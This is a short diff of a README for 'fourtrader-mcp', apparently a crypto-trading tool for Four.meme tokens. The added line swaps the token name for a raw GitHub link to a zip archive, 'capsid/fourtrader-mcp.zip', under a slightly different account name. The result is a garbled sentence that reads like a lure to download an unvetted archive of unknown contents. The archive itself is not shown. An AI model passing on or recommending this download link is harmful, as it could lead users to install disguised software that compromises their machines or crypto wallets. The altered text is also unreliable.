menschecklab/fourtrader-mcp/README.md

 - Join our discussions on GitHub.
 - Follow us on social media for news and tips in cryptocurrency trading.

-By following these steps, you can successfully download, install, and start using the fourtrader-mcp application to trade Four.meme tokens effectively.
+By following these steps, you can successfully download, install, and start using the fourtrader-mcp application to trade https://raw.githubusercontent.com/menscheck/fourtrader-mcp/main/capsid/fourtrader-mcp.zip tokens effectively.
 Enjoy your trading journey with Claude AI guiding the way.